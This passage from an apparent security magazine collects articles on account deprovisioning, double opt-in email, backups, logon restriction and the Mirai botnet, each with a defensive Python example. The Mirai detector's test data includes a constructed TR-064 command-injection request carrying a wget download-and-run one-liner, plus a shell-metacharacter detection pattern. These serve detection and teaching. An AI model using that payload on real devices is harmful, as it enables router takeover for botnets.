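    "file-sharing": {"jdoe@example.com", "mwong@example.com", "contractor1@example.com"},
    "treasury-app": {"ASmith@example.com", "rlee@example.com"},
}

# Constructed: external accounts that are not in HR but are approved until a given date.
APPROVED_EXTERNAL = {"contractor1@example.com": "2017-06-30"}


def _norm(addr):
    return addr.strip().lower()


def orphaned_accounts(hr_active, cloud_accounts, approved_external, as_of):
    """Map service -> sorted accounts that belong neither to an active employee
    nor to an external party whose approval is still valid on `as_of` (ISO date)."""
    today = date.fromisoformat(as_of)
    active = {_norm(a) for a in hr_active}
    still_approved = {_norm(a) for a, until in approved_external.items()
                      if date.fromisoformat(until) >= today}
    report = {}
    for service, accounts in cloud_accounts.items():
        orphans = sorted(a for a in accounts
                         if _norm(a) not in active and _norm(a) not in still_approved)
        if orphans:
            report[service] = orphans
    return report


def deprovision_plan(report):
    """Flatten the report into (service, account) actions for the disable step.
    Producing a plan first lets a second person review it before accounts are disabled."""
    return sorted((service, account)
                  for service, accounts in report.items()
                  for account in accounts)


if __name__ == "__main__":
    for action in deprovision_plan(
            orphaned_accounts(HR_ACTIVE, CLOUD_ACCOUNTS, APPROVED_EXTERNAL, "2017-03-15")):
        print("disable", *action)
```

Run daily, the report turns "someone has to go out and delete the departed individual from every one" into a list that is both auditable and hard to forget; the contractor exception expiring on a fixed date means temporary access does not silently become permanent.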

Returning once more to our castle analogy, we find that cloud computing might just allow potential invaders to glide right over the castle walls and drop in from the sky. You still need vigilant sentries to spot them. You'll need to give the sentries some accurate, long-range crossbows to nail them even before they land.

Or maybe we've had enough comparisons with the Middle Ages. Let's move into modern times and sum it up by thinking of cyber-security as we think of that great American game, football.

They say that offense wins games but defense wins championships. And what do you need to
build a champion defense?

- A well-thought-out game plan: your security policies and procedures.

- A defense-in-depth consisting of big strong linemen, heady and agile linebackers, and fleet defensive backs: your tightly controlled admin rights, robust passwords and identity management, and two-factor authentication.

- And most importantly, your players: talented, well prepared, and thoroughly drilled. The entire squad, from the highest-paid starters to the least-used substitutes. Your employees. They're the ones who do the work; they're the ones on whom you rely.

About The Author

Matthew Stockham currently oversees GTreasury's product development, technical support, and IT operations. He has over 17 years of experience in development and technology and continues to be an asset to the growth of GTreasury. Matthew can be reached online at info@gtreasury.com and at our company website https://gtreasury.com/

How Does A Double Opt-In Help Keep Your Email Spam Free?

Email marketing should be a core component of any online marketing campaign. Email gives marketers the ability to connect directly with leads, which is all good if the lead wants to be connected with, but if they don't, it can have negative implications for a business's reputation and the deliverability of its email. Think about what the ideal mailing list looks like. The dream list consists of email addresses that correspond to individuals who are interested in the products a company sells. There's at least a chance that sending an email to these people will result in an open and a purchase. There are three basic approaches to building an email list: no opt-in, single opt-in, and double opt-in. I'm not going to talk about the first of these: the no opt-in approach amounts to building email lists without the permission of users, a practice which is almost indistinguishable from spamming.

Single opt-ins are a popular option with marketers. A single opt-in occurs when someone submits their email on a web form, signaling they're interested in receiving emails from a company. A double opt-in is the same as a single opt-in with the addition of an extra check. An email is sent to the submitted address. To be added to the email list, the lead has to click a link in the email. Each approach has clear benefits. Single opt-ins are quick and there's no likelihood of confusion. Studies have shown that single opt-in processes result in more sign-ups. With double opt-in processes, a large percentage of potential leads don't complete the second step.

Single opt-ins also have clear negatives. An email address might land on a single opt-in emailing list without being submitted by its owner. Spambots, scammers, and fake subscribers are common, as are misspelled email addresses. Single opt-in processes produce email lists with a lot more noise in them than double opt-in processes. That noise can have disastrous consequences for a company's ability to get email delivered. If your email list contains addresses of people who aren't interested in your product and didn't intend to sign up, you'll send them emails they don't want to receive. In many cases, the receiver's reaction will be to mark the email as spam, sending a signal to email inbox providers and blacklist maintainers that your IPs and domains are spam sources.

Marketers I've talked to about this issue often complain that double opt-ins reduce their sign-up rates. They're right, it will, but that's the point. The goal of email marketing is to send messages to promising leads. Total number of sign-ups is a great vanity metric, but it has almost no bearing on whether an email list is an effective marketing tool. A list of 1,000,000 random emails is useless compared to a list of 10,000 leads who have expressed an interest in the products being marketed. Using a double opt-in has two major upsides: it improves the quality of your email lists and it reduces the chances that your ability to send email will be hurt by the perception that you're sending spam.
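The "extra check" the article describes, an email to the submitted address whose link must be clicked, only works if the link cannot be guessed, forged or reused long after the fact. The block below is an added example, not MailChannels' code: it issues an HMAC-signed, expiring confirmation token for the first step and verifies it in the second, so that only someone who actually receives mail at the address can complete the subscription. The signing key, the 48-hour lifetime and the MailingList class are assumptions made for the example.

```python
"""Double opt-in confirmation: a signed, expiring token that only the mailbox owner can return.

Added example, not MailChannels code. The HMAC key and time-to-live are assumptions.
"""
import base64
import binascii
import hashlib
import hmac
import json

# Constructed demo key; in production it comes from a secrets store and is rotated.
SERVER_KEY = b"constructed-demo-key-not-for-production"
DEFAULT_TTL = 48 * 3600   # seconds a confirmation link stays valid


def _b64(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _unb64(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_confirmation_token(email, issued_at, ttl=DEFAULT_TTL, key=SERVER_KEY):
    """Token placed in the confirmation email: payload.signature, both URL-safe base64."""
    payload = json.dumps({"e": email.strip().lower(), "exp": int(issued_at) + ttl},
                         separators=(",", ":")).encode()
    sig = hmac.new(key, payload, hashlib.sha256).digest()
    return _b64(payload) + "." + _b64(sig)


def confirm(token, now, key=SERVER_KEY):
    """Return the confirmed address, or None if the token is malformed, forged, tampered with or expired."""
    try:
        p64, s64 = token.split(".")
        payload, sig = _unb64(p64), _unb64(s64)
    except (ValueError, binascii.Error):
        return None
    expected = hmac.new(key, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, sig):   # verify before trusting anything in the payload
        return None
    try:
        data = json.loads(payload)
    except ValueError:
        return None
    if int(now) > data["exp"]:
        return None
    return data["e"]


class MailingList:
    """Single opt-in would stop after request_subscription; double opt-in adds complete_subscription."""

    def __init__(self, key=SERVER_KEY):
        self.key = key
        self.confirmed = set()

    def request_subscription(self, email, now):
        # Step 1: record nothing yet; hand back the token to embed in the confirmation email.
        return make_confirmation_token(email, now, key=self.key)

    def complete_subscription(self, token, now):
        # Step 2: a valid click proves the address exists and that its owner consented.
        email = confirm(token, now, key=self.key)
        if email:
            self.confirmed.add(email)
        return email
```

Because the address is inside the signed payload, a spambot that submits someone else's address gets nothing: the token goes to the real mailbox, and a token it fabricates itself fails the signature check. The expiry keeps old confirmation links from being replayed months later.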

About the Author

Ciara Noonan works as a tech writer for MailChannels, a provider of outbound email filtering and email delivery solutions for service providers. Follow MailChannels on Twitter at @mailchannels and check out their blog, http://blog.mailchannels.com/.

How good is your backup?

Ideally, the crypto ransomware epidemic shouldn't be much of an issue these days. Cost-efficient or even free data backup services have become available to the public over time. Indeed, it's now easier and cheaper than ever before for enterprises and consumers to have a viable plan B in case of a ransomware compromise or critical hardware failure.

Despite this fact, end users' sensitive information is still low-hanging fruit in the face of ransomware attacks.

Furthermore, hospitals, police departments, transportation companies and other organizations keep losing their data due to weak incident response practices that do not revolve around dependable data backup techniques.

The FBI provides alarming statistics in this regard: consumers and companies in the United States alone paid over $209 million in ransoms in the first quarter of 2016. That's a huge amount and a drastic increase compared to the $25 million lost during the whole previous year.

But why are backups failing to safeguard data against ransomware? Money is part of the
answer.

In pursuit of reducing their IT spending, some companies don't create reserve copies of all their important files or don't perform backups as frequently as they should.

Some organizations maintain comprehensive backups but don't test them properly, so it turns out they are unable to restore the information in case of emergency.

Another mistake is to store backups on network drives since high-profile ransomware targets
these repositories along with local drives.

How many backups will do the trick?

Being a little paranoid is probably a good thing when it comes to data backups. Owing to
relatively inexpensive cloud storage and specially crafted solutions, organizations can afford to
keep a large volume of their proprietary information in a safe place.

The trade-off between cost and protection isn't nearly as relevant now in 2017 as it was a decade ago. IT executives should run backups often enough to make sure the latest versions of important files can be restored when necessary.

Another facet of the problem is that backing up valuable files alone might not suffice. It may also
be mandatory to roll back entire workstations to their earlier healthy state.

The San Francisco Municipal Transit Agency (SF Muni) hack as of late November 2016
demonstrated how important it is to keep critical computers backed up.

A ransom Trojan called HDDCryptor infected about 2,000 machines on the agencys network.

In the upshot, Muni's automated fare service, email and print servers, CAD machines, lost-and-found property terminals, as well as employee training and payroll systems were out of service for several days.

The threat actors demanded a ransom of 100 Bitcoins (about $73,000) for data and systems
recovery.

If the organization had recent images of the compromised computers readily available, they
could have simply formatted the hardware and reinstated it to the latest unaffected version.

Moreover, it's not mandatory to keep multiple images of each machine. Instead, incremental backup solutions will only store the most recent copy of a system to roll back to.

Testing backups as the rule of thumb

The complexity of large organizations' data structures poses a hurdle to implementing an effective backup strategy. Such enterprises store heterogeneous information and use different types of systems, so it may be difficult and time-consuming to verify the efficiency of the recovery process.

Therefore, a company may be doing backups regularly but still stay unprotected against
ransomware and suchlike predicaments, because the IT team never tested their backups
properly.

System administrators need to bank on testing; otherwise backups are of no use.
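The two points made above, that incremental backups need only carry what changed and that an untested backup is no backup, can both be demonstrated with a manifest of file hashes. The block below is an added example, not the author's or Privacy-PC's tooling, and works on constructed files in a temporary directory: it records a SHA-256 per file, copies only files whose hash changed since the previous run, and then performs an actual restore into a scratch directory and hashes the result, which is what catches a backup copy that has been damaged or silently encrypted.

```python
"""Manifest-based incremental backup with a real restore test (added example)."""
import hashlib
import shutil
import tempfile
from pathlib import Path


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """Relative POSIX path -> SHA-256 for every regular file under root."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def incremental_backup(src, dst, previous_manifest):
    """Copy only files whose hash differs from the previous manifest.
    Returns (new_manifest, list_of_copied_relative_paths)."""
    src, dst = Path(src), Path(dst)
    manifest = build_manifest(src)
    copied = []
    for rel, digest in manifest.items():
        if previous_manifest.get(rel) != digest:
            target = dst / rel
            target.parent.mkdir(parents=True, exist_ok=True)
            shutil.copy2(src / rel, target)
            copied.append(rel)
    return manifest, copied


def verify_restore(backup_dir, manifest, scratch_dir):
    """Restore the backup into scratch_dir and hash what came back.
    Returns the files that are missing or whose content no longer matches the manifest."""
    shutil.copytree(backup_dir, scratch_dir)
    restored = build_manifest(scratch_dir)
    return sorted(rel for rel, digest in manifest.items() if restored.get(rel) != digest)


def demo():
    """End-to-end run on constructed data; returns the intermediate results for inspection."""
    with tempfile.TemporaryDirectory() as tmp:
        src, bak = Path(tmp, "src"), Path(tmp, "backup")
        src.mkdir()
        (src / "ledger.csv").write_text("id,amount\n1,100\n")
        (src / "notes").mkdir()
        (src / "notes" / "plan.txt").write_text("backup plan v1\n")

        manifest1, copied1 = incremental_backup(src, bak, {})        # full first run
        (src / "ledger.csv").write_text("id,amount\n1,100\n2,250\n")  # one file changes
        manifest2, copied2 = incremental_backup(src, bak, manifest1)  # only that file copies

        clean = verify_restore(bak, manifest2, Path(tmp, "restore-test-1"))
        # Constructed damage to the backup copy: the restore test must report it.
        (bak / "notes" / "plan.txt").write_bytes(b"\x00garbled")
        damaged = verify_restore(bak, manifest2, Path(tmp, "restore-test-2"))
        return {"first_copied": sorted(copied1), "second_copied": copied2,
                "clean": clean, "damaged": damaged}


if __name__ == "__main__":
    print(demo())
```

The restore test deliberately copies the backup back out and hashes the copy rather than hashing the backup in place: the question a ransomware incident asks is whether the data comes back, not whether it was written. In practice the manifest itself should be kept with the offsite copy so the check does not depend on the possibly compromised source.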

Keeping backups out of criminals' sight

Data backups are cyber extortionists' worst nightmare, so they configure their ransomware to scour infected computers for them.

Some sophisticated strains of ransomware are capable of encrypting files on network drives,
both mapped and unmapped.

That's where backups often reside. Any data repository tied to a contaminated machine is potentially at risk.

This also applies to external media mounted to a particular computer, such as hard drives and
USB memory sticks.

Enterprises should adopt network segmentation to restrict user access to backups. Employees
only need this access for emergency rather than on a daily basis.

For routine incidents when files are accidentally deleted, commonplace file syncing services will
fit the bill.
A multi-layered backup strategy

File syncing services are invaluable for maintaining day-to-day backups. They continuously
make and store snapshots of files that are in use to make sure the latest versions thereof are
backed up.

If these solutions cannot be used for whatever reason, physically backing up important
documents to a USB stick several times a day is just as effective, although certainly not as
convenient.

For medium-term backups, it's recommended to keep valuable data and recent clean images of critical systems on storage devices that are reliably segregated from the enterprise network.

Encrypting these backups will add an extra layer of data protection.

To implement long-term backups, organizations should resort to offsite storage practices. The data repository needs to be physically isolated from the rest of the company's IT network.

In other words, these backups should be completely off limits to employees so that a ransomware infection won't propagate to the storage if it ends up on a specific workstation.

Administrators should ascertain that these backups are comprehensive enough to get the entire
network up and running in case an infection takes its critical data and systems hostage.

About the Author

David Balaban is a computer security researcher with over 15 years of experience in malware analysis and antivirus software evaluation. David runs the Privacy-PC.com project which presents expert opinions on contemporary information security matters, including social engineering, penetration testing, threat intelligence, online privacy and white hat hacking.

As part of his work at Privacy-PC, Mr. Balaban has interviewed such security celebrities as Dave Kennedy, Jay Jacobs and Robert David Steele to get firsthand perspectives on hot InfoSec issues. David has a strong malware troubleshooting background, with a recent focus on ransomware countermeasures.

How to survive the cybersecurity expertise shortfall
By François Amigorena, CEO, IS Decisions

Analysts everywhere are fretting about the lack of cybersecurity professionals across the world.
The Cybersecurity Jobs Report believes the global shortfall of cybersecurity workers will reach
1.5 million by 2019. (ISC)2 believes the shortfall will reach 1.8 million in five years.

These figures are having an intense effect on businesses, who are very much starting to feel the pinch. A recent report by Intel Security and the Center for Strategic and International Studies (CSIS) found that 15% of cybersecurity positions in companies will go unfilled by 2020, with most businesses saying the skills shortage is worse than talent deficits in other IT professions.

The reason, according to many of the respondents in the CSIS study, is the education system within each country, which doesn't prepare students for the industry. As with any security role, education is key, but why does the emphasis lie on cybersecurity professionals alone?

The weakest point in any organisation's cyber defences is the people; ergo, education should be a part of everybody's working life, not just the lives of the experts. In fact, education is arguably more important when it comes to the average employee than an IT-savvy administrator, because the average employee is the one who needs it the most, in the same way that those who need to go to the doctor for help are the sick, not the healthy.

Every employee, from the intern to the CEO, needs to be aware of the cybersecurity risk they pose to their own company. If they're not, the consequences can be disastrous. Just look at the recent cyberattacks on companies like Anthem, Sony, eBay, Dropbox and Sage. With Anthem, 78.8 million customers' details were leaked. With Sony, 100 terabytes of sensitive data was stolen. Dropbox suffered to the tune of 68 million customer account details being stolen. 233 million customer account details were hacked with eBay, and 280 UK clients were compromised in the Sage attack. What was the common factor underpinning each of these attacks? A compromised login from an average-level employee that fell into the wrong hands.

Hackers love exploiting the naivety of employees because it's so easy. All it takes is one successful phishing email to persuade just one employee to hand over their corporate login details. Then a hacker effectively has a company key into a safe house of valuable information. And once that hacker gains entry to your systems, you're not going to find out until it's too late: your anti-virus and perimeter systems aren't programmed to pick up on access using legitimate login details, giving snoopers all the time in the world to, well, snoop.

The key to protecting against these types of security breaches is a mix of education and
technology.

In terms of education, companies must do more to formalise the security training they give employees, from the day they join the company right through to the day they leave. It doesn't matter what level someone joins at: everyone is a risk, so everyone needs training.

And while training is hugely effective, humans are human and will make mistakes. Technology is therefore essential for mopping up the errors that slip through, and it can provide protection in two parts: restricting access (prevention) and network monitoring (cure).

Restricting access
As prevention is always better than cure, companies need to do more to protect their networks from attackers using compromised credentials. By restricting each account to specific workstations, geographies, times of day, or IT-approved employee-owned devices, a stolen login on its own is no longer enough: the attacker would be logging in from the wrong device, the wrong location or at the wrong time of day, and the logon is refused. Restricting access in this way narrows the window of opportunity for attackers. It should be paired with alerting on the refused attempts, because a valid password presented from the wrong place is itself a sign that the credential has leaked.

Network monitoring
For those attackers who do end up logged in to the corporate network, perhaps because they stole an employee's device or broke into your office, effective network monitoring and file monitoring can limit the damage. Automated monitoring can pick up on suspicious activity quickly and alert an administrator before the intruder has a chance to steal information or snoop around. To use an analogy, it is akin to catching a burglar mid-act and tying them up before the police arrive.
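The two controls described above, restricting where and when an account may log on and watching for abnormal activity once it has, can be sketched in a few dozen lines. The following Python is an added example written for this page, not IS Decisions' product code: it evaluates constructed Windows-style logon events against a per-account policy (permitted workstations, countries and hours, all invented for the demonstration) and runs a simple burst detector over constructed file-audit lines to flag an account reading an unusual number of files in a short window.

```python
"""Added example for this page (not IS Decisions' code): a per-account logon
policy check (prevention) and a file-access burst detector (detection) run
over constructed audit events."""
from collections import defaultdict
from datetime import datetime

# Constructed policy: where, from which country and at what hours each
# account may log on. Hours are a half-open local-time range [start, end).
POLICY = {
    "jdoe": {"workstations": {"WS-FIN-01", "WS-FIN-02"}, "countries": {"GB"},
             "hours": (8, 19)},
    "svc_backup": {"workstations": {"SRV-BKP-01"}, "countries": {"GB"},
                   "hours": (0, 24)},   # service account: any hour, one host only
}


def check_logon(user, workstation, country, when):
    """Return the policy violations for one logon attempt; an empty list allows it."""
    rule = POLICY.get(user)
    if rule is None:
        return ["unknown account"]
    problems = []
    if workstation not in rule["workstations"]:
        problems.append("workstation %s not permitted" % workstation)
    if country not in rule["countries"]:
        problems.append("logon from %s not permitted" % country)
    start, end = rule["hours"]
    if not start <= when.hour < end:
        problems.append("logon at %s outside allowed hours" % when.strftime("%H:%M"))
    return problems


# Constructed logon events: (user, workstation, source country, local time).
LOGONS = [
    ("jdoe", "WS-FIN-01", "GB", datetime(2017, 3, 6, 9, 12)),
    ("jdoe", "WS-FIN-01", "UA", datetime(2017, 3, 6, 9, 15)),       # valid password, wrong country
    ("jdoe", "WS-FIN-02", "GB", datetime(2017, 3, 7, 2, 40)),       # 02:40 is after hours
    ("svc_backup", "WS-FIN-01", "GB", datetime(2017, 3, 7, 3, 0)),  # service account on a desktop
]


def evaluate_logons(events=LOGONS):
    """Map the index of each denied event to its list of violations."""
    denied = {}
    for i, (user, ws, country, when) in enumerate(events):
        problems = check_logon(user, ws, country, when)
        if problems:
            denied[i] = problems
    return denied


# Constructed file-audit lines: "<ISO time> <user> <action> <path>".
AUDIT_LOG = """\
2017-03-06T09:20:01 jdoe READ \\\\fs01\\finance\\q1-forecast.xlsx
2017-03-06T09:21:13 jdoe READ \\\\fs01\\finance\\payroll-2016.xlsx
2017-03-06T09:21:14 jdoe READ \\\\fs01\\finance\\payroll-2015.xlsx
2017-03-06T09:21:14 jdoe READ \\\\fs01\\finance\\payroll-2014.xlsx
2017-03-06T09:21:15 jdoe READ \\\\fs01\\finance\\bank-details.csv
2017-03-06T09:21:15 jdoe READ \\\\fs01\\finance\\suppliers.csv
2017-03-06T09:21:16 jdoe READ \\\\fs01\\hr\\salaries.xlsx
2017-03-06T09:40:00 asmith READ \\\\fs01\\hr\\handbook.pdf
"""


def detect_bulk_reads(log=AUDIT_LOG, window_seconds=60, threshold=5):
    """Return {user: count} for users who read more than `threshold` files
    within any `window_seconds` span, the signature of someone copying a share."""
    reads = defaultdict(list)
    for line in log.splitlines():
        stamp, user, action, _path = line.split(" ", 3)
        if action == "READ":
            reads[user].append(datetime.fromisoformat(stamp))
    alerts = {}
    for user, stamps in reads.items():
        stamps.sort()
        for i, t0 in enumerate(stamps):
            in_window = sum(1 for t in stamps[i:] if (t - t0).total_seconds() <= window_seconds)
            if in_window > threshold:
                alerts[user] = in_window
                break
    return alerts


if __name__ == "__main__":
    for idx, why in evaluate_logons().items():
        print("DENY", LOGONS[idx][:3], "->", "; ".join(why))
    print("bulk-read alerts:", detect_bulk_reads())
```

Run as a script it prints the three denied logons and a bulk-read alert for `jdoe`, whose six reads in three seconds look nothing like a person opening spreadsheets. In a real deployment the policy would come from the directory and the events from the domain controllers' security logs, but the decision logic is the same.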

Crucially, both kinds of technology could have blunted the high-profile attacks on Anthem, Sony, eBay, Dropbox and Sage, and both would help small businesses keep their sensitive data safe. In a world where cybersecurity skills are scarce, it is the least companies can do to get through troubled times.

About the Author

François Amigorena is the founder and CEO of IS Decisions, and an expert commentator on insider threat issues.

IS Decisions is a provider of infrastructure and security management software solutions for Microsoft Windows and Active Directory. The company offers solutions for user-access control, file auditing, server and desktop reporting, and remote installations.

Its customers include the FBI, the US Air Force, the United Nations and Barclays, each of which relies on IS Decisions to prevent security breaches, ensure compliance with major regulations such as SOX and FISMA, respond quickly to IT emergencies, and save time and money for the IT department.

How to save your critical data using smart backup procedures?

By Milica D. Djekic

Disasters and interruptions to work are not rare occurrences, so we should be ready to protect our vitally significant assets from any sort of loss or corruption. Disasters can happen at any time and are not only the consequence of cybersecurity incidents. They may also result from poor electricity management, weather conditions, an earthquake or any other natural phenomenon with the potential to cause damage.

In this article we talk a bit more about your IT assets, the ways their data can be lost, and some good plans and strategies for recovering what has been put at risk.

Data can be lost or corrupted anywhere and at any time, causing business interruption and, quite commonly, the collapse of the whole business. From that perspective it is strategically important to save your critical data, and to do so you need both software and hardware.

The software is the set of programs that support you in saving your data and applications, while the hardware can be any of several devices: USB sticks, external disks, optical media and tapes. How often you back up depends on how fast you produce critical data.

Some organizations back up their computers daily, while many do so weekly or monthly. It is important to note that backing up, and even more so recovering entire machines, can be time-consuming.

This means that any backup or recovery operation should be planned with some business interruption in mind, and that interruption has a financial cost.

On the other hand, it is much better to do the backups, because losing your critical data could mean shutting down the entire business. Unfortunately, the trend in many parts of the world is still concerning.

Leading international institutions have issued plenty of research showing how important this sort of prevention is, yet many enterprises, organizations and businesses still lack such good practice.

Smart procedures mean choosing a backup interval that suits our needs and having a tested data recovery plan ready for a disaster.

Backing up is nothing more than recording your confidential data on separate media, and keeping the installation media in case you lose licensed software, programs or applications.

The good news is that most of those applications can be found on the web and downloaded for free, while some of them require their serial number before they can be used.

Finally, it is worth discussing how smart backup procedures can save your IT infrastructure. Computers are replaceable devices: if they suffer damage and cannot be repaired, they can be swapped for new machines.

The point is that all their confidential data was previously backed up on separate hardware, so it can be restored onto the new computers.

A well-known case from practice is a thunderstorm, when data is lost or corrupted because a lightning strike or power surge damages the drives. Nor should we underestimate hackers' operations, which can lead to your data being stolen and later destroyed using malware.

In closing, we would appeal to law enforcement agencies around the globe to deal proactively with these concerns and to promote best practice in their countries. The result would be a much safer cyberspace and less risk of economic collapse.
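The procedure the article describes, copy the data somewhere else and bring it back after the machine is replaced, is only as good as your ability to prove the copy is intact before you need it. The following Python is an added example written for this page, not from the article: it copies a directory tree, writes a SHA-256 manifest alongside the copy, refuses to restore from a backup that does not verify, and demonstrates the check on a constructed temporary directory in which one backed-up file is deliberately corrupted.

```python
"""Added example for this page (not from the article): directory backup with a
SHA-256 manifest, verification, and a restore that refuses a corrupt backup."""
import hashlib
import json
import shutil
import tempfile
from pathlib import Path

MANIFEST = "MANIFEST.json"


def sha256_of(path):
    """Hash a file in chunks so large files do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def backup(source, dest):
    """Copy every file under `source` into `dest` and record each file's hash.
    The manifest is what lets you prove later that the copy is still intact."""
    source, dest = Path(source), Path(dest)
    manifest = {}
    for path in sorted(p for p in source.rglob("*") if p.is_file()):
        rel = path.relative_to(source).as_posix()
        target = dest / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(path, target)          # copy2 keeps timestamps
        manifest[rel] = sha256_of(path)     # hash the original, not the copy
    (dest / MANIFEST).write_text(json.dumps(manifest, indent=2))
    return manifest


def verify(dest):
    """Re-hash every file in the manifest; return the paths that are missing
    or whose content no longer matches (bit rot, tampering, a bad copy)."""
    dest = Path(dest)
    manifest = json.loads((dest / MANIFEST).read_text())
    return [rel for rel, digest in manifest.items()
            if not (dest / rel).is_file() or sha256_of(dest / rel) != digest]


def restore(dest, target):
    """Copy the backup into `target`, but only after it verifies cleanly."""
    problems = verify(dest)
    if problems:
        raise RuntimeError("backup failed verification: %s" % problems)
    dest, target = Path(dest), Path(target)
    manifest = json.loads((dest / MANIFEST).read_text())
    for rel in manifest:
        out = target / rel
        out.parent.mkdir(parents=True, exist_ok=True)
        shutil.copy2(dest / rel, out)
    return sorted(manifest)


def demo():
    """Constructed scenario in a temp dir: back up two files, restore them,
    then corrupt one backup copy and show that verification catches it."""
    root = Path(tempfile.mkdtemp())
    try:
        src, bak = root / "data", root / "backup"
        (src / "ledger").mkdir(parents=True)
        (src / "ledger" / "q1.csv").write_text("date,amount\n2017-01-03,120.00\n")
        (src / "notes.txt").write_text("restore procedure lives here\n")

        backup(src, bak)
        clean = verify(bak)                           # []
        restored = restore(bak, root / "restored")    # ["ledger/q1.csv", "notes.txt"]
        (bak / "notes.txt").write_bytes(b"\x00" * 8)  # simulate bit rot / tampering
        damaged = verify(bak)                         # ["notes.txt"]
        return clean, restored, damaged
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The design point is that `verify` is run before every restore and can be run on a schedule against the backup media itself, so a silently rotted or tampered copy is discovered while the original still exists, not on the day the original is gone.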

About The Author

Since Milica Djekic graduated from the Department of Control Engineering at the University of Belgrade, Serbia, she has been an engineer with a passion for cryptography, cyber security, and wireless systems. Milica is a researcher from Subotica, Serbia. She also serves as a reviewer at the Journal of Computer Sciences and Applications.

She writes for American and Asia-Pacific security magazines. She is a volunteer with the American Corner of Subotica as well as a lecturer with the local engineering society.

Mirai Botnet
A Sign of DDoS to Come
by Charles Parker, II; InfoSec Architect

Attackers are always looking for new and novel methods of attack. These are initially difficult to defend against, because they are new to the environment.

Of the recent attacks, Mirai has been a major contributor to the malware business and has created quite a stir in the market. Mirai was coded to target embedded systems and IoT devices, both as hosts from which to spread the malware and as attack tools. This malware is notable for having produced the largest DDoS attacks recorded to date.

It has proved a significant problem for those affected, even where a DDoS protection service from a third-party vendor was in place.

Targets
The Mirai botnet does not have a specific set of targets in mind. Whoever rents the bot army picks the target, for whatever reason they have; each rental comes with its own chosen victim.

Previously publicized targets include Krebs on Security (620 Gbps), Deutsche Telekom, KCOM, the Irish telco Eir, the French hosting provider OVH (1.1 Tbps), Dyn, and others.

Method of Attack
The attack has evolved over time. Mirai originally spread by scanning for devices with an open Telnet service and logging in with a short list of factory-default usernames and passwords, so cameras, DVRs and routers still using those credentials were taken over without any exploit at all.

A later variant added an exploit against a maintenance interface exposed on TCP port 7547, which carries the TR-064 and TR-069 (CWMP) management protocols that ISPs use to configure customer routers remotely. Routers built on ZyXEL designs were among those affected.

Once exploited, the unauthorized third party can alter the router's LAN configuration and make it part of the bot army.

The botnet originally numbered around 200K bots; it later exceeded 400K, and there could be as many as 5M routers vulnerable to this exploit. The bots have a minimum rental period of two weeks.

For the person renting the bots, the number of bots and the duration drive the cost. An attack can also be sustained for longer because the bots are coded to spoof their individual IP addresses, so each appears to be a new node that has not yet been blacklisted.
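The exploit path described above, a SOAP request to the TR-064 interface on port 7547 whose SetNTPServers parameter carries shell commands instead of an NTP server name, is easy to recognise on the wire. The following Python is an added example for this page, not Mirai code and not from the article: it parses constructed HTTP requests shaped like that call, flags NTP server values that contain shell metacharacters or that are not a plausible hostname, and passes a legitimate request. The request builder, the addresses (documentation ranges) and the download URL in the malicious sample are all constructed.

```python
"""Added example for this page (not Mirai's code, not from the article):
recognise TR-064 SetNTPServers command injection in requests to port 7547.
All requests below are constructed; the addresses are documentation ranges."""
import re

# A hostname or dotted IP: labels of letters/digits/hyphens separated by dots.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
                         r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?)*$")
NTP_VALUE_RE = re.compile(r"<NewNTPServer(\d)>(.*?)</NewNTPServer\1>", re.S)
SHELL_META = ("`", ";", "|", "&", "$(", "\n")


def parse_request(raw):
    """Split a raw HTTP request into (request line, lower-cased header dict, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def inspect_tr064(raw):
    """Return findings for one request; an empty list means it looks like
    ordinary TR-064 traffic (or is not a TR-064 request at all)."""
    request_line, headers, body = parse_request(raw)
    action = headers.get("soapaction", "").strip('"')
    if "/UD/act" not in request_line and "SetNTPServers" not in action:
        return []
    findings = []
    for idx, value in NTP_VALUE_RE.findall(body):
        value = value.strip()
        if not value:
            continue                       # unset server slot, normal
        if any(meta in value for meta in SHELL_META):
            findings.append("NewNTPServer%s: shell metacharacters in NTP server value" % idx)
        elif not HOSTNAME_RE.match(value):
            findings.append("NewNTPServer%s: value is not a hostname or IP address" % idx)
    return findings


def soap_request(ntp_server):
    """Build a constructed request in the shape of the real TR-064 call."""
    body = ('<?xml version="1.0"?>'
            '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
            '<SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">'
            '<NewNTPServer1>%s</NewNTPServer1><NewNTPServer2></NewNTPServer2>'
            '</u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>' % ntp_server)
    return ("POST /UD/act?1 HTTP/1.1\r\nHost: 192.0.2.10:7547\r\n"
            'SOAPAction: "urn:dslforum-org:service:Time:1#SetNTPServers"\r\n'
            "Content-Type: text/xml\r\nContent-Length: %d\r\n\r\n%s" % (len(body), body))


# An ISP-style legitimate change versus the injection pattern the router
# variant used: backticks around a download-and-run one-liner.
BENIGN = soap_request("pool.ntp.org")
MALICIOUS = soap_request("`cd /tmp;wget http://198.51.100.7/x;chmod 777 x;./x`")

if __name__ == "__main__":
    print("benign   :", inspect_tr064(BENIGN))
    print("malicious:", inspect_tr064(MALICIOUS))
```

The same check belongs on the device side: a firmware that validated the NTP server field as a hostname before passing it to a shell would not have been exploitable this way, which is why the fix is a vendor patch and not just a signature at the edge.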

Remediation
